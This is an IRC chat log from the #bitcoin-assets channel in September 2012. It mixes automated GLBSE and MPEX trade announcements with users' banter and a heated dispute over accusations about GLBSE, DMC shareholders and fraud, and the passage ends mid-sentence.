Sep 13 14:47:49 [GLBSE] [UDN] 3 @ 0.04 = 0.12 BTC [-] Sep 13 14:51:41 [GLBSE] [TYGRR.BOND-B] 1 @ 0.1003 BTC [+] Sep 13 14:52:42 [MPEX] [S.MPOE] 12131 @ 0.00039421 = 4.7822 BTC [+] Sep 13 14:52:43 [MPEX] [S.MPOE] 40869 @ 0.00039411 = 16.1069 BTC [-] Sep 13 14:53:30 [GLBSE] [ASICMINER] 3 @ 0.102 = 0.306 BTC [-] Sep 13 14:54:27 [GLBSE] [ASICMINER] 100 @ 0.1015001 = 10.15 BTC [-] Sep 13 14:54:39 [GLBSE] [JTME] 1 @ 0.7 BTC [-] Sep 13 14:54:49 [GLBSE] [OBSI.HRPT] 10 @ 0.09449999 = 0.945 BTC [+] Sep 13 14:59:58 http://www.youtube.com/watch?v=D827IxEJVS4 Sep 13 15:00:01 top comments are top Sep 13 15:02:19 loool Sep 13 15:10:33 [GLBSE] [YABMC] 3 @ 0.1 = 0.3 BTC [-] Sep 13 15:12:28 seems like bitcoin 'assets' are crashing across the board... Sep 13 15:13:09 That was an assumption. Can't be backed up. Sep 13 15:13:24 ;;seen diablo-d3 Sep 13 15:13:24 Know what assets aren't defaulting Sep 13 15:13:24 diablo-d3 was last seen in #bitcoin-assets 12 hours, 2 minutes, and 47 seconds ago: not with 65nm sasic or 130nm sha ip core they're not Sep 13 15:13:35 mining bonds - backed with REAL assets =) Sep 13 15:13:42 !pl DMC 1 Sep 13 15:13:42 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Sep 13 15:13:44 DMC [1@1BTC] paid: 0.02635814 BTC. Last price: 0.05999999 BTC. Capital gain: -0.94000001 BTC. Total: -0.91364187 BTC. (-91.4%) Sep 13 15:13:50 heh Sep 13 15:14:04 !pl OBSI.HRPT 1 Sep 13 15:14:05 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Sep 13 15:14:06 OBSI.HRPT [1@1BTC] paid: 0.058745 BTC. Last price: 0.09449999 BTC. Capital gain: -0.90550001 BTC. Total: -0.84675501 BTC. (-84.7%) Sep 13 15:14:12 lovely Sep 13 15:15:04 :\!! Sep 13 15:15:10 [GLBSE] [ASICMINER] 10 @ 0.10395 = 1.0395 BTC [+] Sep 13 15:16:45 [GLBSE] [ASICMINER] 25 @ 0.104 = 2.6 BTC [+] Sep 13 15:19:10 [GLBSE] [SILVER] 36 @ 0.00997999 = 0.3593 BTC [+] Sep 13 15:20:40 [GLBSE] [PUREMINING] 3 @ 0.09599999 = 0.288 BTC [+] Sep 13 15:20:42 [GLBSE] [PUREMINING] 97 @ 0.096 = 9.312 BTC [+] Sep 13 15:22:28 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Sep 13 15:22:34 OBSI.HRPT [1@0.1BTC] paid: 0.058745 BTC. Last price: 0.09449999 BTC. Capital gain: -0.00550001 BTC. Total: 0.05324499 BTC. (53.2%) Sep 13 15:22:40 usagi: that what you paid? Sep 13 15:23:01 [MPEX] [F.GIGA.ETF] 40700 @ 0.00041047 = 16.7061 BTC [-] Sep 13 15:23:03 [MPEX] [F.GIGA.ETF] 8000 @ 0.00040981 = 3.2785 BTC [-] Sep 13 15:24:07 [GLBSE] [BTC-MINING] 20 @ 0.996 = 19.92 BTC [+] **** ENDING LOGGING AT Thu Sep 13 15:29:28 2012 **** BEGIN LOGGING AT Thu Sep 13 15:29:50 2012 Sep 13 15:41:30 [GLBSE] [ASICMINER] 18 @ 0.105 = 1.89 BTC [+] Sep 13 15:47:15 [GLBSE] [ASICMINER] 134 @ 0.105 = 14.07 BTC [+] Sep 13 15:50:19 [MPEX] [S.MPOE] 26200 @ 0.00039422 = 10.3286 BTC [+] Sep 13 15:50:20 [MPEX] [S.MPOE] 22800 @ 0.00039475 = 9.0003 BTC [+] Sep 13 15:52:20 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Sep 13 15:52:23 OBSI.HRPT [1@0.1BTC] paid: 0.058745 BTC. Last price: 0.09449999 BTC. Capital gain: -0.00550001 BTC. Total: 0.05324499 BTC. (53.2%) Sep 13 16:02:48 [GLBSE] [OBSI.HRPT] 1 @ 0.0941 BTC [-] Sep 13 16:02:49 [GLBSE] [OBSI.HRPT] 9 @ 0.09419999 = 0.8478 BTC [+] Sep 13 16:03:23 [GLBSE] [OBSI.HRPT] 8 @ 0.09419999 = 0.7536 BTC [+] Sep 13 16:03:24 [GLBSE] [OBSI.HRPT] 2 @ 0.0942 = 0.1884 BTC [+] Sep 13 16:05:30 [GLBSE] [OBSI.HRPT] 1 @ 0.0942 BTC [+] Sep 13 16:05:30 [GLBSE] [OBSI.HRPT] 22 @ 0.09429999 = 2.0746 BTC [+] Sep 13 16:05:32 [GLBSE] [OBSI.HRPT] 5 @ 0.0943 = 0.4715 BTC [+] Sep 13 16:05:33 [GLBSE] [OBSI.HRPT] 26 @ 0.09439999 = 2.4544 BTC [+] Sep 13 16:05:34 [GLBSE] [OBSI.HRPT] 7 @ 0.0944 = 0.6608 BTC [+] Sep 13 16:05:35 [GLBSE] [OBSI.HRPT] 30 @ 0.09449999 = 2.835 BTC [+] Sep 13 16:05:37 [GLBSE] [OBSI.HRPT] 9 @ 0.0945 = 0.8505 BTC [+] Sep 13 16:08:08 [GLBSE] [FPGAMINING] 20 @ 0.69 = 13.8 BTC [-] Sep 13 16:08:24 [GLBSE] [OBSI.HRPT] 10 @ 0.09459999 = 0.946 BTC [+] Sep 13 16:09:48 [GLBSE] [OBSI.HRPT] 10 @ 0.09459999 = 0.946 BTC [+] Sep 13 16:12:29 [GLBSE] [OBSI.HRPT] 8 @ 0.0946 = 0.7568 BTC [+] Sep 13 16:12:30 [GLBSE] [OBSI.HRPT] 10 @ 0.09469999 = 0.947 BTC [+] Sep 13 16:13:31 https://bitcointalk.org/index.php?topic=93445.msg1187534#msg1187534 Sep 13 16:14:52 [GLBSE] [GIGAMINING] 2 @ 0.6179 = 1.2358 BTC [+] Sep 13 16:14:53 [GLBSE] [GIGAMINING] 2 @ 0.618 = 1.236 BTC [+] Sep 13 16:14:54 AA is done in bitcoin. Sep 13 16:14:56 [GLBSE] [ASICMINER] 39 @ 0.105 = 4.095 BTC [+] Sep 13 16:17:17 [GLBSE] [BAKEWELL] 40 @ 0.15 = 6 BTC [+] Sep 13 16:18:18 [GLBSE] [OBSI.HRPT] 30 @ 0.09469999 = 2.841 BTC [+] Sep 13 16:18:19 [GLBSE] [OBSI.HRPT] 9 @ 0.0947 = 0.8523 BTC [+] Sep 13 16:18:21 [GLBSE] [OBSI.HRPT] 11 @ 0.09479999 = 1.0428 BTC [+] Sep 13 16:19:02 [MPEX] [F.GIGA.ETF] 17900 @ 0.00040981 = 7.3356 BTC [-] Sep 13 16:19:04 [MPEX] [F.GIGA.ETF] 15500 @ 0.00040817 = 6.3266 BTC [-] Sep 13 16:19:05 [MPEX] [F.GIGA.ETF] 1173 @ 0.00040534 = 0.4755 BTC [-] Sep 13 16:19:06 [MPEX] [S.MPOE] 3413 @ 0.00039411 = 1.3451 BTC [-] Sep 13 16:19:07 [MPEX] [S.MPOE] 46400 @ 0.00039365 = 18.2654 BTC [-] Sep 13 16:19:08 [MPEX] [S.MPOE] 8287 @ 0.00039332 = 3.2594 BTC [-] Sep 13 16:20:56 [GLBSE] [ASICMINER] 1 @ 0.1015001 BTC [-] Sep 13 16:20:58 [GLBSE] [ASICMINER] 24 @ 0.1015 = 2.436 BTC [-] Sep 13 16:22:44 [GLBSE] [OBSI.HRPT] 30 @ 0.09479999 = 2.844 BTC [+] Sep 13 16:22:46 [GLBSE] [OBSI.HRPT] 9 @ 0.0948 = 0.8532 BTC [+] Sep 13 16:22:47 [GLBSE] [OBSI.HRPT] 1 @ 0.09489999 BTC [+] Sep 13 16:23:23 [GLBSE] [PUREMINING] 19 @ 0.0938 = 1.7822 BTC [-] Sep 13 16:26:11 [GLBSE] [KRAKEN] 1 @ 0.00999999 BTC [+] Sep 13 16:28:12 [GLBSE] [OBSI.HRPT] 7 @ 0.09489999 = 0.6643 BTC [+] Sep 13 16:37:58 [GLBSE] [BMMO] 1 @ 0.076895 BTC [+] Sep 13 16:38:47 [GLBSE] [GSDPT] 10 @ 0.0034 = 0.034 BTC [+] Sep 13 16:39:26 [GLBSE] [DI.BFLSC.FAIL] 15 @ 0.001 = 0.015 BTC [+] Sep 13 16:41:25 [GLBSE] [OBSI.HRPT] 10 @ 0.094 = 0.94 BTC [-] Sep 13 16:43:00 [GLBSE] [OBSI.HRPT] 10 @ 0.093 = 0.93 BTC [-] Sep 13 16:47:02 [MPEX] [F.GIGA.ETF] 11900 @ 0.00041132 = 4.8947 BTC [+] Sep 13 16:49:44 !HELP Sep 13 16:50:14 !help Sep 13 16:50:15 List of commands: Sep 13 16:50:16 !ticker (desc: returns current GLBSE/MPEX ticker values) Sep 13 16:50:17 !pl [@] [] (desc: profit loss calc for GLBSE assets) Sep 13 16:50:30 ty Sep 13 16:52:50 [GLBSE] [OBSI.HRPT] 9 @ 0.092 = 0.828 BTC [-] Sep 13 16:59:40 [GLBSE] [OBSI.HRPT] 10 @ 0.09469999 = 0.947 BTC [+] Sep 13 17:01:55 [GLBSE] [ASICMINER] 1 @ 0.104 BTC [+] Sep 13 17:04:50 [GLBSE] [TYGRR.BOND-P] 10 @ 0.029 = 0.29 BTC [+] Sep 13 17:04:51 [GLBSE] [TYGRR.BOND-P] 1 @ 0.029 BTC [+] Sep 13 17:06:59 [GLBSE] [TYGRR.BOND-P] 25 @ 0.03 = 0.75 BTC [+] Sep 13 17:12:50 http://www.b3tards.com/u/037e58b9e054b3c8dd7b/milksheep.jpg Sep 13 17:13:23 [GLBSE] [OBSI.HRPT] 10 @ 0.094 = 0.94 BTC [-] Sep 13 17:14:02 [MPEX] [S.MPOE] 54613 @ 0.00039332 = 21.4804 BTC [-] Sep 13 17:14:03 [MPEX] [S.MPOE] 1094 @ 0.00039313 = 0.4301 BTC [-] Sep 13 17:14:24 [GLBSE] [OBSI.HRPT] 22 @ 0.09469999 = 2.0834 BTC [+] Sep 13 17:14:25 [GLBSE] [OBSI.HRPT] 5 @ 0.0947 = 0.4735 BTC [+] Sep 13 17:14:26 [GLBSE] [OBSI.HRPT] 23 @ 0.09479999 = 2.1804 BTC [+] Sep 13 17:15:36 [GLBSE] [OBSI.HRPT] 17 @ 0.09479999 = 1.6116 BTC [+] Sep 13 17:17:11 [GLBSE] [OBSI.HRPT] 50 @ 0.092 = 4.6 BTC [-] Sep 13 17:17:20 [GLBSE] [ASICMINER] 6 @ 0.1015 = 0.609 BTC [-] Sep 13 17:17:22 [GLBSE] [ASICMINER] 2 @ 0.100401 = 0.2008 BTC [-] Sep 13 17:17:23 [GLBSE] [ASICMINER] 1 @ 0.1004 BTC [-] Sep 13 17:17:24 [GLBSE] [ASICMINER] 10 @ 0.1004 = 1.004 BTC [-] Sep 13 17:17:26 [GLBSE] [ASICMINER] 14 @ 0.10000002 = 1.4 BTC [-] Sep 13 17:17:26 [GLBSE] [ASICMINER] 2 @ 0.10000001 = 0.2 BTC [-] Sep 13 17:17:27 [GLBSE] [ASICMINER] 1 @ 0.1 BTC [-] Sep 13 17:17:28 [GLBSE] [ASICMINER] 5 @ 0.1 = 0.5 BTC [-] Sep 13 17:17:29 [GLBSE] [ASICMINER] 10 @ 0.1 = 1 BTC [-] Sep 13 17:18:09 [GLBSE] [OBSI.HRPT] 2 @ 0.091 = 0.182 BTC [-] Sep 13 17:20:56 [GLBSE] [MMM] 3 @ 0.9 = 2.7 BTC [-] Sep 13 17:21:48 [GLBSE] [OBSI.HRPT] 26 @ 0.09479999 = 2.4648 BTC [+] Sep 13 17:21:49 [GLBSE] [OBSI.HRPT] 7 @ 0.0948 = 0.6636 BTC [+] Sep 13 17:21:51 [GLBSE] [OBSI.HRPT] 8 @ 0.09489999 = 0.7592 BTC [+] Sep 13 17:22:21 [GLBSE] [GIGAMINING] 1 @ 0.618 BTC [+] Sep 13 17:22:47 [GLBSE] [OBSI.HRPT] 10 @ 0.0948998 = 0.949 BTC [-] Sep 13 17:22:49 [GLBSE] [OBSI.HRPT] 25 @ 0.09489999 = 2.3725 BTC [+] Sep 13 17:22:50 [GLBSE] [OBSI.HRPT] 2 @ 0.0949 = 0.1898 BTC [+] Sep 13 17:22:52 [GLBSE] [OBSI.HRPT] 9 @ 0.0949 = 0.8541 BTC [+] Sep 13 17:22:52 [GLBSE] [OBSI.HRPT] 4 @ 0.098 = 0.392 BTC [+] Sep 13 17:23:46 [GLBSE] [OBSI.HRPT] 5 @ 0.09799999 = 0.49 BTC [-] Sep 13 17:24:28 [GLBSE] [TYGRR.BOND-A] 1 @ 0.119 BTC [+] Sep 13 17:25:07 [GLBSE] [ASICMINER] 24 @ 0.1 = 2.4 BTC [-] Sep 13 17:25:19 [GLBSE] [OBSI.HRPT] 1 @ 0.09799999 BTC [-] Sep 13 17:29:11 [GLBSE] [KRAKEN] 2 @ 0.00999999 = 0.02 BTC [+] Sep 13 17:30:17 lol ChanServ: (notice) Channel #bitcoin-asshats is not registered. Sep 13 17:32:01 !help Sep 13 17:32:02 List of commands: Sep 13 17:32:03 !ticker (desc: returns current GLBSE/MPEX ticker values) Sep 13 17:32:04 !pl [@] [] (desc: profit loss calc for GLBSE assets) Sep 13 17:32:11 !RSM Sep 13 17:32:30 ermahgerd matthewh3 Sep 13 17:32:48 oh matthew holt != MNW Sep 13 17:41:01 [MPEX] [F.GIGA.ETF] 14200 @ 0.00041132 = 5.8407 BTC [+] Sep 13 17:53:35 RSM is doing well we have over 100btc in our wallet Sep 13 18:04:05 [GLBSE] [OBSI.HRPT] 10 @ 0.09299999 = 0.93 BTC [-] Sep 13 18:07:02 [MPEX] [S.MPOE] 11143 @ 0.00039313 = 4.3806 BTC [-] Sep 13 18:07:03 [MPEX] [S.MPOE] 17959 @ 0.00039308 = 7.0593 BTC [-] Sep 13 18:07:04 [MPEX] [S.MPOE] 6998 @ 0.00039307 = 2.7507 BTC [-] Sep 13 18:07:48 [GLBSE] [GSDPT] 1 @ 0.0034 BTC [+] Sep 13 18:11:37 [GLBSE] [ASICMINER] 7 @ 0.10385 = 0.727 BTC [+] Sep 13 18:16:15 fraudsters gonna fraudst Sep 13 18:17:25 ? Sep 13 18:24:22 !ticker ABM Sep 13 18:24:26 !ticker FDBF Sep 13 18:24:28 [GLBSE:ABM] [Bid: 0.07000001] [Ask: 0.19] [Spread: 0.11999999] [Last: 0.1] [24hVol: 1] [7dAvg: 0.1] Sep 13 18:24:29 [GLBSE:FDBF] [Bid: 0.146] [Ask: 0.15] [Spread: 0.004] [Last: 0.15] [24hVol: 37.2] [7dAvg: 0.14999999] Sep 13 18:25:30 who's fraudst'n Sep 13 18:30:25 matthewh3, Sep 13 18:30:29 !ticker rsm Sep 13 18:30:31 [GLBSE:RSM] [Bid: 0.296] [Ask: 0.3] [Spread: 0.004] [Last: 0.3] [24hVol: 13.5] [7dAvg: 0.2999923] Sep 13 18:30:48 what was the ipo price Sep 13 18:32:07 0.4? Sep 13 18:32:15 !pl rsm 0.4 Sep 13 18:32:15 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Sep 13 18:32:17 RSM [1@0.4BTC] paid: 0.01141708 BTC. Last price: 0.3 BTC. Capital gain: -0.1 BTC. Total: -0.08858292 BTC. (-22.1%) Sep 13 18:33:02 [MPEX] [S.MPOE] 17143 @ 0.00039465 = 6.7655 BTC [+] Sep 13 18:33:59 has nefario appologized yet? Sep 13 18:38:52 not sure if he is intending to Sep 13 18:40:40 ;;bc,stats Sep 13 18:40:42 Current Blocks: 198602 | Current Difficulty: 2694047.952955 | Next Difficulty At Block: 199583 | Next Difficulty In: 981 blocks | Next Difficulty In About: 6 days, 12 hours, 41 minutes, and 15 seconds | Next Difficulty Estimate: 2809076.08061153 | Estimated Percent Change: 4.26971344479 Sep 13 18:41:29 kakobreklaa: so how does he intend to keep glbse running after everyone pulls their money out? Sep 13 18:41:38 that Sep 13 18:41:39 wont Sep 13 18:41:40 happen Sep 13 18:41:45 at least not because of this. Sep 13 18:41:56 why would you trust someone that steals assets whenever he wants? Sep 13 18:42:05 why did pirate get away with 5 mio usd Sep 13 18:43:38 kakobreklaa: because nefario didnt do his job Sep 13 18:43:46 most of pirate's money came from ppts Sep 13 18:43:54 all of them are on glbse Sep 13 18:44:08 blah blah Sep 13 18:44:20 you bitch over not handling passthroughs Sep 13 18:44:24 and at the same time Sep 13 18:44:27 that he did handle you. Sep 13 18:44:29 no, I bitch that he singles out dmc Sep 13 18:44:36 but didnt fix any of the ACTUAL PROBLEMS Sep 13 18:44:45 well nobody complained about PPT Sep 13 18:44:53 _I COMPLAINED_ Sep 13 18:45:42 ;> Sep 13 18:45:46 see what i mean. Sep 13 18:47:08 two questions diablo Sep 13 18:47:11 you dont have to answer Sep 13 18:47:26 did ppt do anything outside of the contract? Sep 13 18:47:30 did you have any stake in it? Sep 13 18:47:43 I dont know, and no, I was smart enough to say out of it Sep 13 18:47:51 there you go. Sep 13 18:48:03 kakobreklaa: yes, but I have done nothing against dmc's contract Sep 13 18:48:08 now you should be able to comprehend why this is happening to you. Sep 13 18:48:14 oh? Sep 13 18:48:18 so nefario cant do squat shit Sep 13 18:48:21 im not going in that circle again. Sep 13 18:48:30 theres no circle TO go in Sep 13 18:49:04 if my "shareholders" (and I really doubt any shareholders have said anything to nefario) had problem, they're welcome to sell their shares Sep 13 18:49:46 only two people had problems, and neither of them were shareholders Sep 13 18:50:05 so if I cant get ppt investigated for fraud, they cant have me investigated for their accusations either Sep 13 18:50:40 cant have it both ways. Sep 13 18:50:52 well the ppt time is passe now Sep 13 18:50:58 it is irrelevant Sep 13 18:51:11 nefario could have taken my recommendation _months ago_ Sep 13 18:51:20 and he didnt Sep 13 18:51:31 this is why I dont trust him Sep 13 18:51:44 and now I know why mp keeps calling it the global scam exchange Sep 13 18:59:03 [MPEX] [S.MPOE] 15163 @ 0.00039307 = 5.9601 BTC [-] Sep 13 19:07:40 and now I know why mp keeps calling it the global scam exchange<< this is not because of nefario but the scammy assets on glbse (like 60% or so) Sep 13 19:14:59 PsychoticBoy: yes, the 60% or so DMC invested in Sep 13 19:16:10 like? Sep 13 19:16:38 fixed mhash bonds Sep 13 19:24:25 [MPEX] [S.MPOE] 40536 @ 0.00039307 = 15.9335 BTC [-] Sep 13 19:24:27 [MPEX] [S.MPOE] 659 @ 0.00039304 = 0.259 BTC [-] Sep 13 19:25:13 [GLBSE] [UDN] 1 @ 0.01 BTC [-] Sep 13 19:29:15 [GLBSE] [OBSI.HRPT] 200 @ 0.091999 = 18.3998 BTC [-] Sep 13 19:30:51 [GLBSE] [JAH] 3 @ 0.1349 = 0.4047 BTC [-] Sep 13 19:30:52 [GLBSE] [JAH] 48 @ 0.135 = 6.48 BTC [+] Sep 13 19:37:11 [GLBSE] [UDN] 10 @ 0.01 = 0.1 BTC [-] Sep 13 19:50:37 [MPEX] [S.MPOE] 2400 @ 0.00039363 = 0.9447 BTC [+] Sep 13 19:52:06 [GLBSE] [JAH] 1 @ 0.139 BTC [+] Sep 13 19:53:08 [GLBSE] [ASICMINER] 19 @ 0.1037999 = 1.9722 BTC [-] Sep 13 19:54:10 [GLBSE] [GSDPT] 35 @ 0.0034 = 0.119 BTC [+] Sep 13 19:54:54 [GLBSE] [YABMC] 111 @ 0.0999 = 11.0889 BTC [-] Sep 13 19:55:37 [GLBSE] [DI.BFLSC.FAIL] 10 @ 0.001 = 0.01 BTC [+] Sep 13 20:02:56 [GLBSE] [YABMC] 242 @ 0.1 = 24.2 BTC [+] Sep 13 20:04:21 [GLBSE] [PUREMINING] 2 @ 0.094 = 0.188 BTC [+] Sep 13 20:04:23 [GLBSE] [PUREMINING] 30 @ 0.0937 = 2.811 BTC [-] Sep 13 20:04:24 [GLBSE] [PUREMINING] 2 @ 0.0933 = 0.1866 BTC [-] Sep 13 20:04:26 [GLBSE] [PUREMINING] 99 @ 0.0932 = 9.2268 BTC [-] Sep 13 20:05:55 [GLBSE] [FUTUREFUND] 5900 @ 0.0001268 = 0.7481 BTC [+] Sep 13 20:06:26 [GLBSE] [MOVETO.FUND] 4 @ 1.0299 = 4.1196 BTC [+] Sep 13 20:06:28 [GLBSE] [MOVETO.FUND] 43 @ 1.03 = 44.29 BTC [+] Sep 13 20:06:29 [GLBSE] [MOVETO.FUND] 23 @ 1.15 = 26.45 BTC [+] Sep 13 20:07:26 [GLBSE] [OBSI.HRPT] 1 @ 0.0965 BTC [+] Sep 13 20:07:41 [GLBSE] [OBSI.HRPT] 1 @ 0.085 BTC [-] Sep 13 20:08:16 [GLBSE] [MOVETO.FUND] 5 @ 1.15 = 5.75 BTC [+] Sep 13 20:08:17 [GLBSE] [MOVETO.FUND] 5 @ 1.17580864 = 5.879 BTC [+] Sep 13 20:08:52 [GLBSE] [MOVETO.FUND] 1 @ 1.17580864 BTC [+] Sep 13 20:09:38 [GLBSE] [OBSI.HRPT] 9 @ 0.0965 = 0.8685 BTC [+] Sep 13 20:09:47 [GLBSE] [OBSI.HRPT] 1 @ 0.085 BTC [-] Sep 13 20:10:25 [GLBSE] [OBSI.HRPT] 1 @ 0.0965 BTC [+] Sep 13 20:15:30 [GLBSE] [GIGAMINING] 3 @ 0.6179 = 1.8537 BTC [-] Sep 13 20:21:47 [GLBSE] [GIGAMINING] 1 @ 0.6179 BTC [-] Sep 13 20:23:14 ;;seen mircea_popescu Sep 13 20:23:14 mircea_popescu was last seen in #bitcoin-assets 7 hours, 13 minutes, and 11 seconds ago: jcpham : you wanted a transcript ? http://polimedia.us/fain/activism/barbecuran-pe-trilema-un-blog-de-mircea-popescu-/#c108307 Sep 13 20:23:33 nice Sep 13 20:24:01 [MPEX] [F.GIGA.ETF] 28249 @ 0.00040854 = 11.5408 BTC [-] Sep 13 20:24:02 [MPEX] [F.GIGA.ETF] 20351 @ 0.00040534 = 8.2491 BTC [-] Sep 13 20:26:32 [GLBSE] [HYDRO.BONDS] 2 @ 1.42979 = 2.8596 BTC [+] Sep 13 20:36:49 [GLBSE] [NYAN.B] 4 @ 0.9898 = 3.9592 BTC [-] Sep 13 20:36:50 [GLBSE] [NYAN.B] 1 @ 0.9899 BTC [+] Sep 13 20:39:31 usagi: minecraft.azelphur.com:25567 Sep 13 20:39:42 requires 1.2, we arn't updated yet Sep 13 20:40:29 if your country doesn't have decent routes to NYC your country fails :( Sep 13 20:41:03 usagi: get this client, http://get.spout.org/ it's a better fork of the stock client and lets you select what version your using on start for easy server switching Sep 13 20:41:07 [GLBSE] [GSDPT] 2000 @ 0.0034 = 6.8 BTC [+] Sep 13 20:44:44 good evening Sep 13 20:44:57 heya Sep 13 20:45:10 usd/eur still kickin i see Sep 13 20:45:48 yes, later then Sep 13 20:46:11 PUMP Sep 13 20:49:45 i just read it Sep 13 20:50:52 usagi: yet you threatened me in privmsg about how if I didnt do exactly what you said things would happen Sep 13 20:51:21 you're both a bunch of nutcases, Im sorry I ever associated with either of you Sep 13 20:51:23 ooh i want to be threatened Sep 13 20:52:04 catfight miauw Sep 13 20:52:22 posting logs means nothing, usagi Sep 13 20:52:48 you keep doing that thinking anyone gives a fuck what you claim I said Sep 13 20:53:01 stop flooding or Ill have you banned. Sep 13 20:53:45 probably half the channel has you on ignore now Sep 13 20:53:46 good job. Sep 13 20:54:06 hmmmn I dont see a treat from usagi, Diablo Sep 13 20:54:13 a treat? Sep 13 20:54:15 Where? Sep 13 20:54:19 PsychoticBoy: it was about two weeks ago Sep 13 20:54:56 ok, can be Sep 13 21:01:50 EskimoBob: I dont like being lied to. Sep 13 21:02:52 EskimoBob: it is still my responsibility Sep 13 21:03:02 and I will fight those two to the end if I have to Sep 13 21:04:08 EskimoBob: except shareholders have done no such thing Sep 13 21:04:40 thats what nefario says, but shareholders have already requested to hold the vote now Sep 13 21:04:58 usagi: a few hundred dollars. Sep 13 21:05:22 hm Sep 13 21:05:45 Do you realize that I was trying to hire you to do asset management? Sep 13 21:05:58 You destroyed the chance of that. Sep 13 21:06:07 blame usagi now yea Sep 13 21:07:06 as DMC share holder what should I vote Sep 13 21:07:09 ? Sep 13 21:07:26 not yet up Sep 13 21:07:40 usagi: I _told_ you to take over asset management Sep 13 21:07:47 instead you took it as a chance to attack Obsi Sep 13 21:08:14 Yes, because you already were planning this with nefario to try to steal the company Sep 13 21:08:51 conspiracy ;) Sep 13 21:09:02 no moonlanding bros. Sep 13 21:09:25 kakobrekla: I have a friend who runs a website that disproves the moon landing Sep 13 21:09:26 yes, and I should have never listened to you Sep 13 21:09:47 kakobrekla: http://www.cs.indiana.edu/~kapadia/moon.html Sep 13 21:10:01 usagi: yes, and look how bad that log makes you look Sep 13 21:10:09 you were trying to make me play right into nefario's hands Sep 13 21:10:18 copumpkin lol on .edu, nice :) Sep 13 21:10:31 :) Sep 13 21:10:36 read it Sep 13 21:10:38 it's pretty good Sep 13 21:10:51 he makes some excellent points, and I think that NASA should address them Sep 13 21:11:49 >If you look at A and B, you will see that the astronauts are not wearing any helmets!!! That says it all. The government must think that we are morons. Sep 13 21:11:51 iloled Sep 13 21:13:43 yes Sep 13 21:13:46 yeah they were filmed on a set on the moon Sep 13 21:13:51 you can see it by the lack of helmets. Sep 13 21:18:21 No one drinks bud light Sep 13 21:18:45 I drink bud light lime Sep 13 21:18:52 LOL @ moon stuff. Sep 13 21:19:01 o lol @ JRO profile Sep 13 21:19:07 Website: Why wait for your bitcoins? Sep 13 21:19:09 https://bitcointalk.org/index.php?action=profile;u=22299 Sep 13 21:19:11 :DDD Sep 13 21:20:28 Hmm... Saw something similar yesterday. Some company that accepts the risk for quick transactions. Sep 13 21:20:35 well Sep 13 21:20:46 my answer to that is "CAUSE YOU FUCKED UP" Sep 13 21:20:55 remember, he owes a bunch Sep 13 21:21:24 OneMiner urlpls? Sep 13 21:21:31 Orly? Bah, dosen't apply to me anyways. I can wait an hour for a TX. Sep 13 21:21:36 I'll try to find it. Sep 13 21:24:47 http://smpake.com/ Sep 13 21:24:55 ah Sep 13 21:24:59 lol Sep 13 21:25:03 i tought i had competition Sep 13 21:25:05 :> Sep 13 21:25:32 Oh? You doing that stuff too? Sep 13 21:25:46 yeah Sep 13 21:25:53 lots of work awaits me with smpake Sep 13 21:26:05 been busy and sick these last days unfortanetly Sep 13 21:26:07 hahaha ok, now I get it. Sep 13 21:27:00 Very low fees. Wow. Sep 13 21:28:35 yep Sep 13 21:31:57 hm whats up with ianbakewell is he baked or something Sep 13 21:32:43 !ticker OBSI.HRPT Sep 13 21:33:11 [GLBSE:OBSI.HRPT] [Bid: 0.086] [Ask: 0.1] [Spread: 0.014] [Last: 0.1] [24hVol: 702.84300068] [7dAvg: 0.09573003] Sep 13 21:33:28 kakobrekla: I dunno, he keeps shitting up the dmc with nonsensical responses Sep 13 21:33:51 Why are the OBSI.HRPT trades not showing up? Sep 13 21:33:54 on the chat Sep 13 21:34:08 !ticker obsi.hrpt Sep 13 21:34:11 [GLBSE:OBSI.HRPT] [Bid: 0.086] [Ask: 0.1] [Spread: 0.014] [Last: 0.1] [24hVol: 702.84300068] [7dAvg: 0.09573003] Sep 13 21:34:20 dunno, should be working fine Sep 13 21:34:36 My position was just exited without it showing up Sep 13 21:35:26 big trade too. 2034@0.1 Sep 13 21:35:42 actually Sep 13 21:35:44 I havent seen ANY trades Sep 13 21:35:48 maybe twit feed is down Sep 13 21:35:57 hm Sep 13 21:36:02 i hear you Sep 13 21:40:04 Obsi: btw, you're wanted on the dmc thread Sep 13 21:42:22 [MPEX] [S.MPOE] 27000 @ 0.00039331 = 10.6194 BTC [-] Sep 13 21:42:24 [MPEX] [S.MPOE] 27041 @ 0.00039304 = 10.6282 BTC [-] Sep 13 21:42:25 [MPEX] [S.MPOE] 159 @ 0.00039303 = 0.0625 BTC [-] Sep 13 21:45:59 [GLBSE] [BFLS.RIG] 1 @ 0.989 BTC [+] Sep 13 21:46:17 [GLBSE] [BITCOINRS] 50 @ 0.052 = 2.6 BTC [+] Sep 13 21:46:27 You already dragged him into it when you said he was a scam Sep 13 21:46:56 [GLBSE] [BITCOINRS] 1 @ 0.05 BTC [-] Sep 13 21:47:41 [GLBSE] [GOLD] 250 @ 0.00989 = 2.4725 BTC [+] Sep 13 21:49:08 [GLBSE] [MERGEDMINING] 4 @ 0.075 = 0.3 BTC [+] Sep 13 21:49:30 [GLBSE] [MERGEDMINING] 3 @ 0.0795 = 0.2385 BTC [+] Sep 13 21:51:09 and another mining company Sep 13 21:53:00 Diablo-D3, owning an irrelvenantamount of shares of your company is in this matter .. well.. irrelvenant. Sep 13 21:53:07 [GLBSE] [SILVER] 15 @ 0.01 = 0.15 BTC [+] Sep 13 21:53:12 [GLBSE] [MERGEDMINING] 10 @ 0.07999 = 0.7999 BTC [+] Sep 13 21:53:13 seems to be this bag is being punched over and over again Sep 13 21:53:38 irrelevant Sep 13 21:56:34 I live in Holland, maybe I should do some Pot asset Sep 13 21:57:49 [GLBSE] [BFLS.RIG] 2 @ 0.989 = 1.978 BTC [+] Sep 13 21:57:56 [GLBSE] [ASICMINER] 1 @ 0.10445 BTC [+] Sep 13 21:57:58 [GLBSE] [ASICMINER] 117 @ 0.1048 = 12.2616 BTC [+] Sep 13 21:59:06 [GLBSE] [SS] 50 @ 0.027 = 1.35 BTC [+] Sep 13 22:00:50 [GLBSE] [PUREMINING] 5 @ 0.09575 = 0.4788 BTC [+] Sep 13 22:00:52 [GLBSE] [PUREMINING] 30 @ 0.0958 = 2.874 BTC [+] Sep 13 22:00:53 [GLBSE] [PUREMINING] 5 @ 0.0959 = 0.4795 BTC [+] Sep 13 22:02:20 we are collecting evidance and will be giving the to a lawyer. we will then 